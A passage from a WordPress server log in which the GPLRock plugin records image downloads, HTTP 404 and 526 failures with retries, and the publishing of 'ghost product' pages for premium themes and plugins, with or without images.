1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:38 UTC] GPLRock: Image download failed for product time-tracking-and-activity-reporting-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-tracking-and-activity-reporting-wordpress-plugin-18845.webp for product time-tracking-and-activity-reporting-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:40 UTC] GPLRock WARNING: Image download failed for product time-tracking-and-activity-reporting-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/time-tracking-and-activity-reporting-wordpress-plugin-18845.webp [04-Apr-2026 08:33:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: time-tracking-and-activity-reporting-wordpress-plugin [04-Apr-2026 08:33:50 UTC] GPLRock: Image downloaded successfully for product masterstudy-education-lms-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13a03360.jpg [04-Apr-2026 08:33:50 UTC] GPLRock: Using pre-downloaded image for product masterstudy-education-lms-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13a03360.jpg [04-Apr-2026 08:33:50 UTC] GPLRock: Ghost product published with image - Product ID: masterstudy-education-lms-wordpress-theme [04-Apr-2026 08:33:51 UTC] GPLRock: Image downloaded successfully for product wpbakery-page-builder-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41d7623f.jpg [04-Apr-2026 08:33:51 UTC] GPLRock: Using pre-downloaded image for product wpbakery-page-builder-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41d7623f.jpg [04-Apr-2026 08:33:51 UTC] GPLRock: Ghost product published with image - Product ID: wpbakery-page-builder-for-wordpress [04-Apr-2026 08:33:55 UTC] GPLRock: Image download failed for product dokan-pro-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:33:59 UTC] GPLRock: Image download failed for product dokan-pro-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:34:03 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/11/Dokan-Pro-WordPress-Plugin.jpg for product dokan-pro-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:34:05 UTC] GPLRock: Image download failed for product dokan-pro-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:34:09 UTC] GPLRock: Image download failed for product dokan-pro-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:34:13 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/11/Dokan-Pro-WordPress-Plugin.jpg for product dokan-pro-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:34:13 UTC] GPLRock WARNING: Image download failed for product dokan-pro-wordpress-plugin. URL: https://www.gplrock.com/wp-content/uploads/2020/11/Dokan-Pro-WordPress-Plugin.jpg [04-Apr-2026 08:34:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dokan-pro-wordpress-plugin [04-Apr-2026 08:34:15 UTC] GPLRock: Image downloaded successfully for product advanced-custom-fields-acf-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-faf7e117.jpg [04-Apr-2026 08:34:15 UTC] GPLRock: Using pre-downloaded image for product advanced-custom-fields-acf-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-faf7e117.jpg [04-Apr-2026 08:34:15 UTC] GPLRock: Ghost product published with image - Product ID: advanced-custom-fields-acf-pro [04-Apr-2026 08:34:16 UTC] GPLRock: Image downloaded successfully for product kapee-fashion-store-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1cb14bb8.jpg [04-Apr-2026 08:34:16 UTC] GPLRock: Using pre-downloaded image for product kapee-fashion-store-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1cb14bb8.jpg [04-Apr-2026 08:34:16 UTC] GPLRock: Ghost product published with image - Product ID: kapee-fashion-store-woocommerce-theme [04-Apr-2026 08:34:18 UTC] GPLRock: Image downloaded successfully for product school-management-education-learning-management-system-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0fc13149.jpg [04-Apr-2026 08:34:18 UTC] GPLRock: Using pre-downloaded image for product school-management-education-learning-management-system-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0fc13149.jpg [04-Apr-2026 08:34:18 UTC] GPLRock: Ghost product published with image - Product ID: school-management-education-learning-management-system-for-wordpress [04-Apr-2026 08:34:19 UTC] GPLRock: Image downloaded successfully for product careerfy-job-board-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0bcf864.jpg [04-Apr-2026 08:34:19 UTC] GPLRock: Using pre-downloaded image for product careerfy-job-board-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0bcf864.jpg [04-Apr-2026 08:34:19 UTC] GPLRock: Ghost product published with image - Product ID: careerfy-job-board-wordpress-theme [04-Apr-2026 08:34:21 UTC] GPLRock: Image downloaded successfully for product updraftplus-premium-wordpress-backup-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68679c2e.jpg [04-Apr-2026 08:34:21 UTC] GPLRock: Using pre-downloaded image for product updraftplus-premium-wordpress-backup-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68679c2e.jpg [04-Apr-2026 08:34:21 UTC] GPLRock: Ghost product published with image - Product ID: updraftplus-premium-wordpress-backup-plugin [04-Apr-2026 08:34:24 UTC] GPLRock: Image download failed for product all-in-one-seo-pro-gpl-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:34:28 UTC] GPLRock: Image download failed for product all-in-one-seo-pro-gpl-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:34:32 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/All-In-One-SEO-PRO-WordPress-Plugin.jpg for product all-in-one-seo-pro-gpl-plugin after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:34:34 UTC] GPLRock: Image download failed for product all-in-one-seo-pro-gpl-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:34:38 UTC] GPLRock: Image download failed for product all-in-one-seo-pro-gpl-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 08:34:42 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/All-In-One-SEO-PRO-WordPress-Plugin.jpg for product all-in-one-seo-pro-gpl-plugin after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 08:34:42 UTC] GPLRock WARNING: Image download failed for product all-in-one-seo-pro-gpl-plugin. URL: https://www.gplrock.com/wp-content/uploads/2020/07/All-In-One-SEO-PRO-WordPress-Plugin.jpg [04-Apr-2026 08:34:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: all-in-one-seo-pro-gpl-plugin [04-Apr-2026 08:34:45 UTC] GPLRock: Image downloaded successfully for product dooplay-wordpress-theme-for-movies-and-tvshows (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-428cbb73.png [04-Apr-2026 08:34:45 UTC] GPLRock: Using pre-downloaded image for product dooplay-wordpress-theme-for-movies-and-tvshows: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-428cbb73.png [04-Apr-2026 08:34:45 UTC] GPLRock: Ghost product published with image - Product ID: dooplay-wordpress-theme-for-movies-and-tvshows [04-Apr-2026 08:35:01 UTC] GPLRock: Image download failed for product kyros-personal-portfolio-cv-resume-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:03 UTC] GPLRock: Image download failed for product kyros-personal-portfolio-cv-resume-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kyros---personal-portfolio-cv-resume-theme-4740.webp for product kyros-personal-portfolio-cv-resume-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:06 UTC] GPLRock: Image download failed for product kyros-personal-portfolio-cv-resume-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:08 UTC] GPLRock: Image download failed for product kyros-personal-portfolio-cv-resume-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kyros---personal-portfolio-cv-resume-theme-4740.webp for product kyros-personal-portfolio-cv-resume-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:10 UTC] GPLRock WARNING: Image download failed for product kyros-personal-portfolio-cv-resume-theme. URL: https://meldwp.com/wp-content/uploads/kyros---personal-portfolio-cv-resume-theme-4740.webp [04-Apr-2026 08:35:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kyros-personal-portfolio-cv-resume-theme [04-Apr-2026 08:35:10 UTC] GPLRock: Image download failed for product themebau-minimal-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:12 UTC] GPLRock: Image download failed for product themebau-minimal-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/themebau--minimal-portfolio--agency-wordpress-theme-30631.webp for product themebau-minimal-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:14 UTC] GPLRock: Image download failed for product themebau-minimal-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:16 UTC] GPLRock: Image download failed for product themebau-minimal-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/themebau--minimal-portfolio--agency-wordpress-theme-30631.webp for product themebau-minimal-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:18 UTC] GPLRock WARNING: Image download failed for product themebau-minimal-portfolio-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/themebau--minimal-portfolio--agency-wordpress-theme-30631.webp [04-Apr-2026 08:35:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: themebau-minimal-portfolio-agency-wordpress-theme [04-Apr-2026 08:35:19 UTC] GPLRock: Image download failed for product corredo-motorcycle-bike-race-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:21 UTC] GPLRock: Image download failed for product corredo-motorcycle-bike-race-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corredo--motorcycle--bike-race-sports-wordpress-theme-22651.webp for product corredo-motorcycle-bike-race-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:23 UTC] GPLRock: Image download failed for product corredo-motorcycle-bike-race-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:25 UTC] GPLRock: Image download failed for product corredo-motorcycle-bike-race-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corredo--motorcycle--bike-race-sports-wordpress-theme-22651.webp for product corredo-motorcycle-bike-race-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:27 UTC] GPLRock WARNING: Image download failed for product corredo-motorcycle-bike-race-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/corredo--motorcycle--bike-race-sports-wordpress-theme-22651.webp [04-Apr-2026 08:35:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: corredo-motorcycle-bike-race-sports-wordpress-theme [04-Apr-2026 08:35:27 UTC] GPLRock: Image download failed for product mato-movie-studios-and-filmmakers-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:29 UTC] GPLRock: Image download failed for product mato-movie-studios-and-filmmakers-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mato---movie-studios-and-filmmakers-wordpress-theme-21309.webp for product mato-movie-studios-and-filmmakers-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:31 UTC] GPLRock: Image download failed for product mato-movie-studios-and-filmmakers-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:34 UTC] GPLRock: Image download failed for product mato-movie-studios-and-filmmakers-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mato---movie-studios-and-filmmakers-wordpress-theme-21309.webp for product mato-movie-studios-and-filmmakers-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:36 UTC] GPLRock WARNING: Image download failed for product mato-movie-studios-and-filmmakers-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mato---movie-studios-and-filmmakers-wordpress-theme-21309.webp [04-Apr-2026 08:35:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mato-movie-studios-and-filmmakers-wordpress-theme [04-Apr-2026 08:35:36 UTC] GPLRock: Image download failed for product mr-tailor-ecommerce-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:38 UTC] GPLRock: Image download failed for product mr-tailor-ecommerce-wordpress-theme-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mr-tailor---ecommerce-wordpress-theme-for-woocommerce-28577.webp for product mr-tailor-ecommerce-wordpress-theme-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:40 UTC] GPLRock: Image download failed for product mr-tailor-ecommerce-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:42 UTC] GPLRock: Image download failed for product mr-tailor-ecommerce-wordpress-theme-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mr-tailor---ecommerce-wordpress-theme-for-woocommerce-28577.webp for product mr-tailor-ecommerce-wordpress-theme-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:44 UTC] GPLRock WARNING: Image download failed for product mr-tailor-ecommerce-wordpress-theme-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/mr-tailor---ecommerce-wordpress-theme-for-woocommerce-28577.webp [04-Apr-2026 08:35:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mr-tailor-ecommerce-wordpress-theme-for-woocommerce [04-Apr-2026 08:35:44 UTC] GPLRock: Image download failed for product driveme-driving-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:47 UTC] GPLRock: Image download failed for product driveme-driving-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/driveme---driving-school-wordpress-theme-7394.webp for product driveme-driving-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:49 UTC] GPLRock: Image download failed for product driveme-driving-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:51 UTC] GPLRock: Image download failed for product driveme-driving-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/driveme---driving-school-wordpress-theme-7394.webp for product driveme-driving-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:53 UTC] GPLRock WARNING: Image download failed for product driveme-driving-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/driveme---driving-school-wordpress-theme-7394.webp [04-Apr-2026 08:35:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: driveme-driving-school-wordpress-theme [04-Apr-2026 08:35:53 UTC] GPLRock: Image download failed for product noren-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:55 UTC] GPLRock: Image download failed for product noren-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:35:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/noren--shop-wordpress-woocommerce-theme-8818.webp for product noren-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:35:57 UTC] GPLRock: Image download failed for product noren-shop-wordpress-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:00 UTC] GPLRock: Image download failed for product noren-shop-wordpress-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/noren--shop-wordpress-woocommerce-theme-8818.webp for product noren-shop-wordpress-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:36:02 UTC] GPLRock WARNING: Image download failed for product noren-shop-wordpress-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/noren--shop-wordpress-woocommerce-theme-8818.webp [04-Apr-2026 08:36:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: noren-shop-wordpress-woocommerce-theme [04-Apr-2026 08:36:02 UTC] GPLRock: Image download failed for product hibreed-wordpress-whmcs-hosting-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:04 UTC] GPLRock: Image download failed for product hibreed-wordpress-whmcs-hosting-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hibreed---wordpress--whmcs-hosting-theme-2950.webp for product hibreed-wordpress-whmcs-hosting-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:36:06 UTC] GPLRock: Image download failed for product hibreed-wordpress-whmcs-hosting-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:08 UTC] GPLRock: Image download failed for product hibreed-wordpress-whmcs-hosting-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hibreed---wordpress--whmcs-hosting-theme-2950.webp for product hibreed-wordpress-whmcs-hosting-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:36:10 UTC] GPLRock WARNING: Image download failed for product hibreed-wordpress-whmcs-hosting-theme. URL: https://meldwp.com/wp-content/uploads/hibreed---wordpress--whmcs-hosting-theme-2950.webp [04-Apr-2026 08:36:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hibreed-wordpress-whmcs-hosting-theme [04-Apr-2026 08:36:10 UTC] GPLRock: Image download failed for product reestate-real-estate-with-mls-idx-listing-realtor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:13 UTC] GPLRock: Image download failed for product reestate-real-estate-with-mls-idx-listing-realtor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reestate---real-estate-with-mls-idx-listing-realtor-theme-18633.webp for product reestate-real-estate-with-mls-idx-listing-realtor-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:36:15 UTC] GPLRock: Image download failed for product reestate-real-estate-with-mls-idx-listing-realtor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:17 UTC] GPLRock: Image download failed for product reestate-real-estate-with-mls-idx-listing-realtor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/reestate---real-estate-with-mls-idx-listing-realtor-theme-18633.webp for product reestate-real-estate-with-mls-idx-listing-realtor-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:36:19 UTC] GPLRock WARNING: Image download failed for product reestate-real-estate-with-mls-idx-listing-realtor-theme. URL: https://meldwp.com/wp-content/uploads/reestate---real-estate-with-mls-idx-listing-realtor-theme-18633.webp [04-Apr-2026 08:36:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: reestate-real-estate-with-mls-idx-listing-realtor-theme [04-Apr-2026 08:36:19 UTC] GPLRock: Image download failed for product lawking-lawyer-and-attorney-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:21 UTC] GPLRock: Image download failed for product lawking-lawyer-and-attorney-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawking---lawyer-and-attorney-responsive-wordpress-theme-11329.webp for product lawking-lawyer-and-attorney-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:36:23 UTC] GPLRock: Image download failed for product lawking-lawyer-and-attorney-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:26 UTC] GPLRock: Image download failed for product lawking-lawyer-and-attorney-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:36:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawking---lawyer-and-attorney-responsive-wordpress-theme-11329.webp for product lawking-lawyer-and-attorney-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:36:28 UTC] GPLRock WARNING: Image download failed for product lawking-lawyer-and-attorney-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lawking---lawyer-and-attorney-responsive-wordpress-theme-11329.webp [04-Apr-2026 08:36:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lawking-lawyer-and-attorney-responsive-wordpress-theme [04-Apr-2026 08:41:20 UTC] GPLRock: Image downloaded successfully for product envira-gallery-schedule-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ef36d9e.jpg [04-Apr-2026 08:41:20 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-schedule-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ef36d9e.jpg [04-Apr-2026 08:41:20 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-schedule-addon [04-Apr-2026 08:41:22 UTC] GPLRock: Image downloaded successfully for product envira-gallery-defaults-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ade518a5.jpg [04-Apr-2026 08:41:22 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-defaults-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ade518a5.jpg [04-Apr-2026 08:41:22 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-defaults-addon [04-Apr-2026 08:41:24 UTC] GPLRock: Image downloaded successfully for product ninja-forms-paypal-express (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-144075ff.jpg [04-Apr-2026 08:41:24 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-paypal-express: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-144075ff.jpg [04-Apr-2026 08:41:24 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-paypal-express [04-Apr-2026 08:41:25 UTC] GPLRock: Image downloaded successfully for product cleanco-cleaning-service-company-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-572cd50f.jpg [04-Apr-2026 08:41:25 UTC] GPLRock: Using pre-downloaded image for product cleanco-cleaning-service-company-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-572cd50f.jpg [04-Apr-2026 08:41:25 UTC] GPLRock: Ghost product published with image - Product ID: cleanco-cleaning-service-company-wordpress-theme [04-Apr-2026 08:41:27 UTC] GPLRock: Image downloaded successfully for product alterna-ultra-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44f015e2.jpg [04-Apr-2026 08:41:27 UTC] GPLRock: Using pre-downloaded image for product alterna-ultra-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-44f015e2.jpg [04-Apr-2026 08:41:27 UTC] GPLRock: Ghost product published with image - Product ID: alterna-ultra-multi-purpose-wordpress-theme [04-Apr-2026 08:41:29 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-add-bulk (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b635892.jpg [04-Apr-2026 08:41:29 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-add-bulk: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b635892.jpg [04-Apr-2026 08:41:29 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-add-bulk [04-Apr-2026 08:41:31 UTC] GPLRock: Image downloaded successfully for product blaszok-ecommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9c298c2.jpg [04-Apr-2026 08:41:31 UTC] GPLRock: Using pre-downloaded image for product blaszok-ecommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9c298c2.jpg [04-Apr-2026 08:41:31 UTC] GPLRock: Ghost product published with image - Product ID: blaszok-ecommerce-theme [04-Apr-2026 08:41:32 UTC] GPLRock: Image downloaded successfully for product searchwp-dutch-keyword-stemmer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8026a459.jpg [04-Apr-2026 08:41:32 UTC] GPLRock: Using pre-downloaded image for product searchwp-dutch-keyword-stemmer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8026a459.jpg [04-Apr-2026 08:41:32 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-dutch-keyword-stemmer [04-Apr-2026 08:41:34 UTC] GPLRock: Image downloaded successfully for product elmastudio-piha-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8adf9778.jpg [04-Apr-2026 08:41:34 UTC] GPLRock: Using pre-downloaded image for product elmastudio-piha-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8adf9778.jpg [04-Apr-2026 08:41:34 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-piha-wordpress-theme [04-Apr-2026 08:41:35 UTC] GPLRock: Image downloaded successfully for product studiopress-pretty-creative-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f35fa6e8.jpg [04-Apr-2026 08:41:35 UTC] GPLRock: Using pre-downloaded image for product studiopress-pretty-creative-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f35fa6e8.jpg [04-Apr-2026 08:41:35 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-pretty-creative-pro-genesis-wordpress-theme [04-Apr-2026 08:45:04 UTC] GPLRock: Image downloaded successfully for product wp-cost-estimation-payment-forms-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b407845b.jpg [04-Apr-2026 08:45:04 UTC] GPLRock: Using pre-downloaded image for product wp-cost-estimation-payment-forms-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b407845b.jpg [04-Apr-2026 08:45:04 UTC] 